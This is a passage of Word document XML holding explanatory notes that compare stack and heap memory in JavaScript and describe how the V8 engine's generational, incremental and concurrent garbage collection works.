        </w:rPr>
        <w:t>Stack Memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Typically smaller and limited in size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6675E0" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="262"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Heap Memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Larger and more flexible in size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC4EFE2" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="262"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Lifetime and Scope</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1433A551" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="262"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Stack Memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Limited to the function or block scope, and variables are only available during that time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C59E3C7" w14:textId="77777777" w:rsidR="00C80C51" w:rsidRPr="00DA2F32" w:rsidRDefault="00C80C51" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="262"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Heap Memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Objects persist as long as there are references to them, and their lifetime is not limited by function scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AEF10E" w14:textId="77777777" w:rsidR="00DF0F2D" w:rsidRPr="00DA2F32" w:rsidRDefault="00DF0F2D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BDCF014" w14:textId="4C6290EF" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="91" w:name="_Toc178383274"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How does the V8 engine handle garbage collection.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
    </w:p>
    <w:p w14:paraId="5C2AF07A" w14:textId="77777777" w:rsidR="00952562" w:rsidRPr="00DA2F32" w:rsidRDefault="00952562" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Generational Garbage Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765861E4" w14:textId="77777777" w:rsidR="00952562" w:rsidRPr="00DA2F32" w:rsidRDefault="00952562" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>V8 uses a generational approach to garbage collection, which divides the heap into different regions based on the lifespan of objects:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B06569" w14:textId="77777777" w:rsidR="00952562" w:rsidRPr="00DA2F32" w:rsidRDefault="00952562" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Young Generation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: This is where newly created objects are allocated. It is further divided into two regions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052F311C" w14:textId="77777777" w:rsidR="00952562" w:rsidRPr="00DA2F32" w:rsidRDefault="00952562" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Eden Space</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: The area where new objects are initially allocated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7BA8FA" w14:textId="77777777" w:rsidR="00952562" w:rsidRPr="00DA2F32" w:rsidRDefault="00952562" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Survivor Spaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Objects that survive one or more garbage collection cycles in the Eden space are moved to survivor spaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690E8CA8" w14:textId="77777777" w:rsidR="00952562" w:rsidRPr="00DA2F32" w:rsidRDefault="00952562" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Old Generation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: This is where objects that have survived multiple garbage collection cycles in the young generation are eventually promoted. The old generation has a larger heap space and is used for objects with a longer lifespan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E370363" w14:textId="77777777" w:rsidR="00952562" w:rsidRPr="00DA2F32" w:rsidRDefault="00952562" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Garbage Collection Phases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F89DE8E" w14:textId="77777777" w:rsidR="00952562" w:rsidRPr="00DA2F32" w:rsidRDefault="00952562" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>V8's garbage collection process involves several phases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772BD582" w14:textId="77777777" w:rsidR="00952562" w:rsidRPr="00DA2F32" w:rsidRDefault="00952562" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Minor GC</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: This is a quick collection process that focuses on the young generation. Minor GC is triggered when the Eden space is full. The process involves:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AAD9F4" w14:textId="77777777" w:rsidR="00952562" w:rsidRPr="00DA2F32" w:rsidRDefault="00952562" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Marking</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Identifying live objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20785E0D" w14:textId="77777777" w:rsidR="00952562" w:rsidRPr="00DA2F32" w:rsidRDefault="00952562" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Sweeping</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Reclaiming memory used by unreachable objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BCEE97" w14:textId="77777777" w:rsidR="00952562" w:rsidRPr="00DA2F32" w:rsidRDefault="00952562" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Copying</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Moving live objects from the Eden space to survivor spaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F19F6D7" w14:textId="77777777" w:rsidR="00952562" w:rsidRPr="00DA2F32" w:rsidRDefault="00952562" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Major GC (or Full GC)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: This is a more comprehensive collection process that involves the entire heap, including both young and old generations. Major GC is triggered less frequently than minor GC and involves:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421F63BB" w14:textId="77777777" w:rsidR="00952562" w:rsidRPr="00DA2F32" w:rsidRDefault="00952562" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Marking</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Identifying live objects in both young and old generations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4941DDAA" w14:textId="77777777" w:rsidR="00952562" w:rsidRPr="00DA2F32" w:rsidRDefault="00952562" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Sweeping</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Reclaiming memory used by unreachable objects in both generations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE1AFB3" w14:textId="77777777" w:rsidR="00952562" w:rsidRPr="00DA2F32" w:rsidRDefault="00952562" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Compacting</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Moving objects to reduce fragmentation and free up contiguous memory blocks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331E6A47" w14:textId="77777777" w:rsidR="00952562" w:rsidRPr="00DA2F32" w:rsidRDefault="00952562" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Incremental Garbage Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DFF033" w14:textId="77777777" w:rsidR="00952562" w:rsidRPr="00DA2F32" w:rsidRDefault="00952562" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>To avoid long pauses due to garbage collection, V8 employs incremental and concurrent collection techniques:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0E962B" w14:textId="77777777" w:rsidR="00952562" w:rsidRPr="00DA2F32" w:rsidRDefault="00952562" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Incremental GC</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Breaks down the garbage collection process into smaller chunks, allowing the application to continue running in between.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA3A798" w14:textId="77777777" w:rsidR="00952562" w:rsidRPr="00DA2F32" w:rsidRDefault="00952562" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Concurrent GC</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Runs garbage collection tasks concurrently with application code execution to minimize pauses. This involves concurrent marking and sweeping phases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D613FFE" w14:textId="77777777" w:rsidR="00952562" w:rsidRPr="00DA2F32" w:rsidRDefault="00952562" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Compaction</w:t>
      </w:r>
    </w:p>
